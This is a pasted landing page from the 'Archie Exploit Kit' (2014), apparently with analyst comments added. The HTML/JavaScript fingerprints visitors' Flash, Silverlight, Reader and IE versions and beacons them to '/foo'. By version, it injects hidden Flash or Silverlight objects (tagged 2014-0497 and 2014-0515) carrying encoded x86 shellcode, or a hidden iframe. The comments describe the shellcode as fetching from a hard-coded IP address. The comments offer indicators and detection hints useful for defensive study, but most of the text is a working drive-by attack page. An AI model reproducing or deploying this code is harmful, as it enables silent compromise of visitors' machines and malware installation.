physicaldrive0

Archie Exploit Kit

Sep 23rd, 2014
  1. *** @PhysicalDrive0 ***
  2.  
  3. 2 <html>
  4. 3 <head>
  5. 4 <script type="text/javascript" src="pluginDet.js"></script>
  6. 5 <style type="text/css">
  7. 6 html, body { height: 100%; overflow: auto; }
  8. 7 body { padding: 0; margin: 0; }
  9. 8 #form1 { height: 99%; }
  10. 9 #silverlightControlHost { text-align:center; }
  11. 10 </style>
  12. 11 <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  13. 12 </head>
  14. 13 <body>
  15. 14 </body>
  16. 15 <script>
  // NOTE(analysis): the three strings below appear to carry the same x86 shellcode in
  // three encodings, one per delivery branch: raw hex (payload), comma-separated 32-bit
  // words (payload2) and base64 (payload3). All three begin their common body with the
  // bytes FC E8 ("/Oi" in base64), which is a convenient content signature.
  // The tail of each string is plain ASCII for an http:// URL; the hex form
  // 687474703A2F2F...2F6464 decodes to hxxp://144.76.36[.]67:8083/dd (defanged), a
  // network indicator for this sample. The pushed immediates "on\0\0"/"urlm" suggest a
  // urlmon-based download stub; confirm by disassembly in an isolated sandbox.
  17. 16 var payload = "FCE8A20000006089E531D2648B52308B520C8B52148B7228528B52108B423C8B44027885C0744801D0508B48188B582001D3E33A498B348B01D631FF31C0AC84C07407C1CF0D01C7EBF43B7D2475E3588B582401D3668B0C4B8B581C01D38B048B01D0894424205A61595A51FFE0585A8B12EBA16A40680010000068000400006A006854CAAF91FFD5C389C8C1E902F2A588C180E103F2A4C331C0505051535068361A2F70FFD5C35D686F6E00006875726C6D54688E4E0EECFFD5E8B4FFFFFF505068040100006833CA8A5BFFD5508B74240401C6B065880646B02E880646B064880646B06C880646B06C880646B000
  18. 8806EB228B4C24088B1C2451E898FFFFFF688E4E0EECFFD568983A000068B0492DDBFFD5EB21E8D9FFFFFF687474703A2F2F3134342E37362E33362E36373A383038332F6464005858585858C3";
  // payload2: same body as little-endian dwords, preceded by four extra words and
  // padded with 0x90 bytes at the end; passed to flashhigh.swf by flashHigh().
  19. 17 var payload2 = "0x0018A164,0xC0830000,0x81208b08,0xFFF830C4,0xA2E8FCFF,0x60000000,0xD231E589,0x30528B64,0x8B0C528B,0x728B1452,0x528B5228,0x3C428B10,0x7802448B,0x4874C085,0x8B50D001,0x588B1848,0xE3D30120,0x348B493A,0x31D6018B,0xACC031FF,0x0774C084,0x010DCFC1,0x3BF4EBC7,0xE375247D,0x24588B58,0x8B66D301,0x588B4B0C,0x8BD3011C,0xD0018B04,0x20244489,0x5A59615A,0x58E0FF51,0xEB128B5A,0x68406AA1,0x00001000,0x00040068,0x68006A00,0x91AFCA54,0x89C3D5FF,0x02E9C1C8,0xC188A5F2,0xF203E180,0xC031C3A4,0x5351
  20. 5050,0x1A366850,0xD5FF702F,0x6F685DC3,0x6800006E,0x6D6C7275,0x4E8E6854,0xD5FFEC0E,0xFFFFB4E8,0x685050FF,0x00000104,0x8ACA3368,0x50D5FF5B,0x0424748B,0x65B0C601,0xB0460688,0x4606882E,0x068864B0,0x886CB046,0x6CB04606,0xB0460688,0xEB068800,0x244C8B22,0x241C8B08,0xFF98E851,0x8E68FFFF,0xFFEC0E4E,0x3A9868D5,0xB0680000,0xFFDB2D49,0xE821EBD5,0xFFFFFFD9,0x70747468,0x312F2F3A,0x372E3434,0x36332E36,0x3A37362E,0x33383038,0x0064642F,0x58585858,0x9090C358";
  21. 18
  // payload3: base64 form, passed to silverapp1.xap by silverHigh() via InitParams.
  22. 19 var payload3 = "/OiiAAAAYInlMdJki1Iwi1IMi1IUi3IoUotSEItCPItEAniFwHRIAdBQi0gYi1ggAdPjOkmLNIsB1jH/McCshMB0B8HPDQHH6/Q7fSR141iLWCQB02aLDEuLWBwB04sEiwHQiUQkIFphWVpR/+BYWosS66FqQGgAEAAAaAAEAABqAGhUyq+R/9XDicjB6QLypYjBgOED8qTDMcBQUFFTUGg2Gi9w/9XDXWhvbgAAaHVybG1UaI5ODuz/1ei0////UFBoBAEAAGgzyopb/9VQi3QkBAHGsGWIBkawLogGRrBkiAZGsGyIBkawbIgGRrAAiAbrIotMJAiLHCRR6Jj///9ojk4O7P/VaJg6AABosEkt2//V6yHo2f///2h0dHA6Ly8xNDQuNzYuMzYuNjc6ODA4My9kZABYWFhYWMOQkJA=";
  23. 20
  // NOTE(analysis): injection helper used by flashLow/flashHigh/silverHigh. It appends
  // an empty <span> to the body and then assigns `val` to innerHTML, so the markup in
  // `val` (an <object>/<form> tag) is parsed and the plugin is instantiated.
  24. 21 function spanAppend(val)
  25. 22 {
  26. 23 var a = document.createElement("span");
  27. 24 document.body.appendChild(a);
  // The span is attached first; setting innerHTML afterwards inserts the markup live.
  28. 25 a.innerHTML = val;
  29. 26 }
  30. 27
  // NOTE(analysis): Branch 1 delivery. Injects a 1x1 Flash ActiveX <object> (classid
  // d27cdb6e-..., i.e. the IE Flash control) that loads flashlow.swf from the same
  // directory and hands it the hex-encoded `payload` string as FlashVars `id=`.
  // The dispatch switch at the end of the script labels this branch "2014-0497",
  // presumably CVE-2014-0497. Hunting hints: 1x1 Flash objects with
  // allowScriptAccess=always and a FlashVars value that is a long hex blob.
  // The source line is wrapped by the paste site in the middle of `value="true"`.
  31. 28 function flashLow()
  32. 29 {
  33. 30 spanAppend('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" /><param name="movie" value="flashlow.swf" /><param name="allowScriptAccess" value="always" /><param name="FlashVars" value="id='+payload+'" /><param name="Play" valu
  34. e="true" /></object>');
  35. 31 }
  36. 32
  // NOTE(analysis): Branch 2 delivery. Same 1x1 Flash ActiveX <object> pattern as
  // flashLow, but it loads flashhigh.swf and passes the dword-list `payload2` as
  // FlashVars `sh=`. The dispatch switch labels this branch "2014-0515", presumably
  // CVE-2014-0515. The hard-coded element id "23kjsdf" is a static string that can
  // serve as a content signature for this landing page.
  37. 33 function flashHigh()
  38. 34 {
  39. 35 spanAppend('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="1" height="1" id="23kjsdf"><param name="movie" value="flashhigh.swf" /><param name="FlashVars" value="sh='+payload2+'" /></object>');
  40. 36 }
  41. 37
  // NOTE(analysis): Branch 3 delivery. Injects a Silverlight <object> that loads
  // silverapp1.xap and receives the base64 `payload3` through InitParams
  // (`payload=`). The surrounding form/div ids match the CSS rules in the page head
  // (#form1, #silverlightControlHost). No CVE label is given for this branch on the
  // page. The source line is wrapped by the paste site in the middle of `payload3`.
  42. 38 function silverHigh()
  43. 39 {
  44. 40 spanAppend('<form id="form1" runat="server" ><div id="silverlightControlHost"><object data="data:application/x-silverlight-2," type="application/x-silverlight-2" width="100%" height="100%"><param name="source" value="silverapp1.xap"/><param name="background" value="white" /><param name="InitParams" value="payload='+p
  45. ayload3+'" /></object></div></form>');
  46. 41 }
  47. 42
  // NOTE(analysis): thin wrapper around PluginDetect.isMinVersion for Flash.
  // `val` is a comma-separated version string such as "11,3,300,257". The callers
  // below compare the result with 1 and -0.1; in the PluginDetect library these
  // presumably mean "installed and >= val" and "installed but < val". Confirm against
  // the bundled pluginDet.js.
  48. 43 function fV(val)
  49. 44 {
  50. 45 return PluginDetect.isMinVersion("Flash", val);
  51. 46 }
  52. 47
  // NOTE(analysis): Silverlight counterpart of fV. Returns whatever
  // PluginDetect.isMinVersion reports for the given minimum version string; the caller
  // compares it with 1 and -0.1 to bracket a vulnerable version range.
  53. 48 function sV(val)
  54. 49 {
  55. 50 return PluginDetect.isMinVersion("Silverlight", val);
  56. 51 }
  57. 52
  // NOTE(analysis): fallback delivery used for Branch 0 and 4. Builds a borderless
  // 10x10 <iframe> pointing at `turl` and appends it to the body. Property and tag
  // names are held in single-letter variables and used through bracket access, a light
  // obfuscation that defeats naive string matching on "createElement('iframe')".
  // Every variable here is assigned without var, so all of them (w, r, q, s, z, c, g,
  // hh, ha, b) become globals; `z` and `b` are assigned but not used afterwards.
  58. 53 function ie(turl)
  59. 54 {
  60. 55 w = "frameBorder";
  61. 56 r = "width";
  62. 57 q = "iframe";
  63. 58 s = "height";
  64. 59 z = "createElement";
  65. 60 c = "src";
  66. 61 g = '10';
  67. 62 hh = turl;
  68. 63 ha = document.createElement(q);
  69. 64 ha[w] = '0';
  70. 65 ha[r] = g;
  71. 66 ha[s] = g;
  // Sets iframe.src; navigation starts once the element is attached below.
  72. 67 b = ha[c] = hh;
  73. 68 document.body.appendChild(ha);
  74. 69 return;
  75. 70 }
  76. 71
  // NOTE(analysis): user-agent gate. Returns true only when the UA contains "MSIE",
  // does not contain "Win64;", and reports Trident/4, 5 or 6; any exception yields
  // false. It is not called anywhere in the visible listing, so it looks like a
  // leftover from another build of the page.
  // `[t](j)` with t = "test" is RegExp.prototype.test called through bracket access.
  // All locals are implicit globals.
  77. 72 function ieVerOk()
  78. 73 {
  79. 74 t = "test";
  80. 75 try {
  81. 76 j = window.navigator.userAgent.toLowerCase();
  82. 77 x = /MSIE[\/\s]\d+/i [t](j);
  83. 78 m = /Win64;/i [t](j);
  // RegExp.$1 is the legacy static holding the first capture of the last match.
  84. 79 z = /Trident\/(\d)/i [t](j) ? parseInt(RegExp.$1) : null;
  85. 80 if (!m && x && z && (z == 6 || z == 5 || z == 4)) {
  86. 81 return true
  87. 82 }
  88. 83 } catch (exc) {}
  89. 84 return false
  90. 85 }
  91. 86
  // NOTE(analysis): estimates the Internet Explorer major version by feature detection
  // instead of the user-agent string, so a spoofed UA does not change the result.
  // The ladder returns 11, 10, 9, 8 or 7 depending on the first API found
  // (msCrypto, atob, addEventListener, JSON + querySelector, XMLHttpRequest) and 0
  // when nothing matches or an exception is thrown. It is only called when arch()
  // returned non-zero, i.e. when ActiveX instantiation succeeded.
  // `t` is assigned (as an implicit global) but not used in this function.
  92. 87 function ieVer() {
  93. 88 t = "test";
  94. 89 try {
  95. 90 if (window.msCrypto)
  96. 91 return 11;
  97. 92 if (window.atob)
  98. 93 return 10;
  99. 94 if (document.addEventListener)
  100. 95 return 9;
  101. 96 if (window.JSON && document.querySelector)
  102. 97 return 8;
  103. 98 if (window.XMLHttpRequest)
  104. 99 return 7;
  105. 100 } catch (exc) { }
  106. 101 return 0
  107. 102 }
  108. 103
  // NOTE(analysis): fingerprints OS bitness through the Microsoft.XMLDOM ActiveX
  // control. It loads a DOCTYPE whose system identifier is a res:// URL inside
  // "Program Files (x86)" and inspects parseError.errorCode.
  // Returns 64 when the error code equals -2147023083, 32 for any other code, and 0
  // when ActiveXObject/XMLDOM is unavailable (exception). Presumably that specific
  // code means the res:// target file exists, which implies a 64-bit Windows install;
  // verify before relying on it. A return of 0 also doubles as a "not IE" signal for
  // the caller. Hunting hint: script that feeds res:// paths to XMLDOM.loadXML is a
  // local-file probing technique and rarely legitimate.
  109. 104 function arch() {
  110. 105 try
  111. 106 {
  112. 107 var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
  // Synchronous parse so parseError is populated before the check below.
  113. 108 xmlDoc.async = false;
  114. 109 xmlDoc.loadXML('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "res://c:\\Program Files (x86)\\Internet Explorer\\iexplore.exe">');
  115. 110 if (xmlDoc.parseError.errorCode == -2147023083)
  116. 111 {
  117. 112 return 64;
  118. 113 }
  119. 114 }
  120. 115 catch (ex)
  121. 116 {
  122. 117 return 0;
  123. 118 }
  124. 119 return 32;
  125. 120 }
  126. 121
  // NOTE(analysis): victim fingerprinting and branch selection.
  // Branch values: 0 = nothing matched, 1 = Flash exact-build list, 2 = Flash version
  // range, 3 = Silverlight range, 4 = ActiveX available (IE) but no plugin match.
  127. 122 var flashVer = PluginDetect.getVersion("Flash");
  128. 123 var Branch = 0;
  // Branch 1: exact match against seven Flash 11.0 - 11.2 build strings.
  129. 124 if (flashVer == "11,0,1,152"
  130. 125 || flashVer == "11,1,102,55" || flashVer == "11,1,102,62"
  131. 126 || flashVer == "11,1,102,63" || flashVer == "11,2,202,228"
  132. 127 || flashVer == "11,2,202,233" || flashVer == "11,2,202,235")
  133. 128 Branch = 1;
  134. 129
  135. 130
  // Branch 2: two half-open Flash ranges, each written as "at least the first version
  // and below the second" (== 1 and == -0.1 respectively; see fV).
  136. 131 if (fV("11,3,300,257") == 1 && (fV("11,7,700,276") == -0.1))
  137. 132 Branch = 2;
  138. 133 if (fV("11,8,800,94") == 1 && (fV("13,0,0,183") == -0.1))
  139. 134 Branch = 2;
  140. 135
  141. 136 var silverVer = PluginDetect.getVersion("Silverlight");
  142. 137 var silverBranch = 0;
  // Silverlight range: at least 4.0.50401.0 and below 5.1.10412.0.
  143. 138 if (sV("4,0,50401,0") == 1 && sV("5,1,10412,0") == -0.1)
  144. 139 silverBranch = 1;
  145. 140
  146. 141
  // Adobe Reader version is collected for the beacon only; adoberBranch is never
  // changed or read again in the visible code.
  147. 142 var adoberVer = PluginDetect.getVersion("AdobeReader");
  148. 143 var adoberBranch = 0;
  149. 144
  150. 145 var archSys = arch();
  151. 146 var ieVersion = 0;
  152. 147 if (archSys != 0)
  153. 148 ieVersion = ieVer();
  154. 149
  // Beacon body: dump=<flash>|<silverlight>|<reader>|<arch>|<ie>|<branch>&ua=...&ref=...
  // It is built before Branch is promoted to 3 or 4 below, so the reported branch is
  // only ever 0, 1 or 2. encodeURI leaves "&" and "=" unescaped inside ua/ref.
  155. 150 var sendstr = "";
  156. 151 sendstr += encodeURI("dump=" + flashVer + "|" + silverVer + "|" + adoberVer + "|" + archSys + "|" + ieVersion + "|" + Branch);
  157. 152 sendstr += encodeURI("&ua=" + window.navigator.userAgent);
  158. 153 sendstr += encodeURI("&ref=" + document.referrer);
  159. 154
  // Fallbacks apply only when no Flash branch matched: Silverlight first, then the
  // generic IE path.
  160. 155 if (Branch == 0 && silverBranch == 1)
  161. 156 Branch = 3;
  162. 157 if (Branch == 0 && archSys != 0)
  163. 158 Branch = 4;
  164. 159
  // NOTE(analysis): telemetry beacon. Sends the fingerprint string as the body of a
  // synchronous (third argument false) POST to "/foo" on the landing host before any
  // exploit content is injected; failures are silently ignored. Detection hint: an
  // HTTP POST to /foo whose body starts with "dump=" followed by pipe-separated plugin
  // versions and then "&ua=" / "&ref=".
  165. 160 try
  166. 161 {
  167. 162 var xmlhttp = new XMLHttpRequest();
  168. 163 xmlhttp.open("POST", "/foo", false);
  169. 164 xmlhttp.send(sendstr);
  170. 165 }
  171. 166 catch (exc){}
  172. 167
  173. 168
  // NOTE(analysis): dispatch on the branch chosen during fingerprinting. The author's
  // "2014-0497" / "2014-0515" comments presumably name CVE-2014-0497 and CVE-2014-0515
  // (both Flash Player). Files requested relative to the landing page, useful as
  // URL indicators: flashlow.swf, flashhigh.swf, silverapp1.xap, /iebasic.html.
  174. 169 switch (Branch)
  175. 170 {
  176. 171 //2014-0497
  177. 172 case 1:
  178. 173 flashLow();
  179. 174 break;
  180. 175
  181. 176 //2014-0515
  182. 177 case 2:
  183. 178 flashHigh();
  184. 179 break;
  185. 180
  // Silverlight path; no CVE label is given on the page.
  186. 181 case 3:
  187. 182 silverHigh();
  188. 183 break;
  189. 184
  // Branch 0 (nothing matched, including non-IE browsers) and 4 (IE without a
  // matching plugin) both load /iebasic.html in a 10x10 iframe. The commented-out
  // lines show an earlier variant that passed the 32/64-bit flag to /phazar.html.
  190. 185 case 0:
  191. 186 case 4:
  192. 187 //var avar = archSys == 32 ? 0 : 1;
  193. 188 //ie("/phazar.html?a="+avar);
  194. 189
  195. 190 ie("/iebasic.html");
  196. 191 break;
  197. 192 }
  198. 193
  199. 194
  200. 195 </script>
  201. 196 </html>